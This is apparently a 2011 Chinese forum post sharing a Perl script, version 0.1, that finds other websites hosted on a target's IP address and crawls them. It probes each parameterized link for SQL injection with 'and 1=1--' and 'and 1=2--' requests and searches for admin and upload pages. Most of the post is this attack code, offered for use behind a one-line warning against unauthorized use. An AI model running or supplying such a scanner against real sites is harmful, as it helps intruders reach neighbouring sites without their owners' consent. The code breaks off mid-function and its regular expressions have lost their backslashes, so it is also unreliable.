自动旁注检测工具代码
仅仅是测试目的,运行基本上已经通过,但是BUG还有很多,以后慢慢更新
由于鼓励自己继续前进的原因,此版本暂时命名为 0.1 :)
简单说明:
基于whois.webhosting.info平台获取旁注网站地址,读取和处理都是多线程工作
多线程部分采用了云舒的模型,该部分引用了许多他的代码,非常感谢他的劳动:)
主要功能是SQL注入简单测试,类似与and 1=1这样的,后台管理和上传路径的检测
:)ps: 转载请注明处处,欢迎喜欢它的人修改以及完善代码
注意: 切勿在未经授权下使用该程序攻击网站,可以作为检测网站安全性的一个小工具:)
#!/usr/bin/perl
# Code by naninb
# Mac osx 10.6.6 & perl 5.10.0
# Date 2011-03-7
#-==============================-
use strict;
use warnings;
use URI::URL;
use Web::Scraper;
use LWP::Simple;
use Net::hostent;
use Socket;
use Bloom::Filter;
use threads;
use threads::shared;
use Thread::Queue;
use Thread::Semaphore;
if (@ARGV < 1 || @ARGV >2)
{
warn "[-] Parameters error,Please input target url, and a thread numbers ";
exit;
}
my $my_target = gethost($ARGV[0])->addr;
my $host = URI::URL->new("host>http://".$ARGV[0])->host;
my $thread_number = $ARGV[1]||5;
my @same_ip_sites;
my $gms_filter = Bloom::Filter->new( capacity => 1024, error_rate => .0001 );
my $pu_filter = shared_clone(Bloom::Filter->new( capacity => 10000, error_rate => .0001 ));
my $sites_queue = Thread::Queue->new();
my $semaphore = Thread::Semaphore->new( $thread_number );
my $mutex = Thread::Semaphore->new( 1 );
# get others sites thread
threads->create(Get_More_Sites,$my_target);
while( 1 )
{
# join all threads which can be joined
#my $joined = 0;
foreach ( threads->list(threads::joinable) )
{
#$joined ++;
$_->join( );
}
#print $joined, " joined ";
# if there are no url need process.
my $item = $sites_queue->pending();
if( $item == 0 )
{
my $active = threads->list(threads::running);
# there are no active thread, we finish the job
if( $active == 0 )
{
print "All done! ";
last;
}
# we will get some more url if there are some active threads, just wait for them
else
{
#print "[MAIN] 0 URL, but $active active thread ";
sleep 1;
next;
}
}
# if there are some url need process
#print "[MAIN] $item URLn";
$semaphore->down;
#print "[MAIN]Create thread.n";
threads->create( &ProcessUrl );
}
foreach (threads->list())
{
$_->join();
}
sub Get_More_Sites
{
my ($site) = @_;
my $res;
my $page_number;
my $html_filter = scraper {
process "//a", "list[]" => { link => @href, text => "TEXT" };
};
my $whois_my_target = "http://whois.webhosting.info/".inet_ntoa($site);
my $first_try = get($whois_my_target);
if (!defined $first_try){
warn "[-] Get page numbers error! ";
exit;
}
# count pages numbersif($first_try =~ /pi=(d*)8&ob=SLD&oo=ASC">Next/i)
{
$page_number = $1;
}elsif($first_try =~ /pi=(d*)&ob=SLD&oo=ASC"> Last/i)
{
$page_number = $1;
}
die "[-] Searching encounter random number authentication, try manual to post it! " unless defined $page_number;
my $i = 1;while($i <= $page_number)
{
my $whois_my_target = $whois_my_target."?pi=".$i."&ob=SLD&oo=ASC";
eval
{
$res = $html_filter->scrape( URI->new($whois_my_target) );
};
if( $@ )
{
#warn "$@ ";
exit;
}
for my $a_text (@{$res->{list}})
{
#print "$a_text->{link}, $a_text->{text} ";
if( $a_text->{link} =~ /^http://whois.webhosting.info/$a_text->{text}/ )
{
if($a_text->{text} =~ /([wd]+.[w]{2,3})./)
{
# filter repeat elements
if (!$gms_filter->check($1))
{
#print "www.".$1." ";
$gms_filter->add($1);
push @same_ip_sites, "www.".$1;$sites_queue->enqueue("http://www.".$1);
}}
}
}
$i++;}
if ($sites_queue->pending() < 1)
{
warn "[-] Your target have not much more sites for you, sorry! ";
exit;
}
}
sub ProcessUrl
{
my $scraper = scraper
{
process //a, links[] => @href;
};
my $res;
my $link;
while( my $url = $sites_queue->dequeue_nb() )
{
eval
{
$res = $scraper->scrape( URI->new($url) )->{links};
};
if( $@ )
{
#warn "$@ ";
next;
}
next if (! defined $res );
print "[+] Testing $url ";
foreach( @{$res} )
{
$link = $_->as_string;
$link = URI::URL->new($link, $url);
# not http and not https?
next if( $link->scheme ne http && $link->scheme ne https );
#next if( $link->host ne $host );
my $flag = 0;
foreach (@same_ip_sites)
{
($flag = 1,last) if ($_ eq $link->host);
}
next if( $flag == 1 );
$link = $link->abs->as_string;
$mutex->down();
# detect something
# sql injection, 2011-03-07
Detect_Sql_inj($link);
# manage page path
Detect_Manage_page($link);
# upload page path
Dectect_Upload_page($link);
if( ! $pu_filter->check($link) ){
print $pu_filter->key_count(), " ", $link, " ";
$pu_filter->add($link);
$sites_queue->enqueue($link);
}
$mutex->up();
undef $link;
}
undef $res;
}
undef $scraper;
$semaphore->up( );
}
sub Detect_Sql_inj
{
my ($link) = @_;
if( $link =~ /(.*?)?(wd*)=/ )
{
my $and11 = get($link." and 1=1--");
my $and12 = get($link." and 1=2--");
print "[+] Found sql injection at the ",$link," " if( length($and11) != length($and12) );
my $and13 = get($link." and 1=1--");my $and14 = get($link." and 1=2--");
print "[+] Found sql injection at the ",$link," " if( length($and13) != length($and14) );
}}
sub Detect_Manage_page
{
my ($link) = @_;
my @mm_path = ("admin","adm","manage","administrator");
if ($link =~ /(.*?)#(.*)/){
use LWP::UserAgent;
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
$ua->env_prox
补充:综合编程 , 安全编程 ,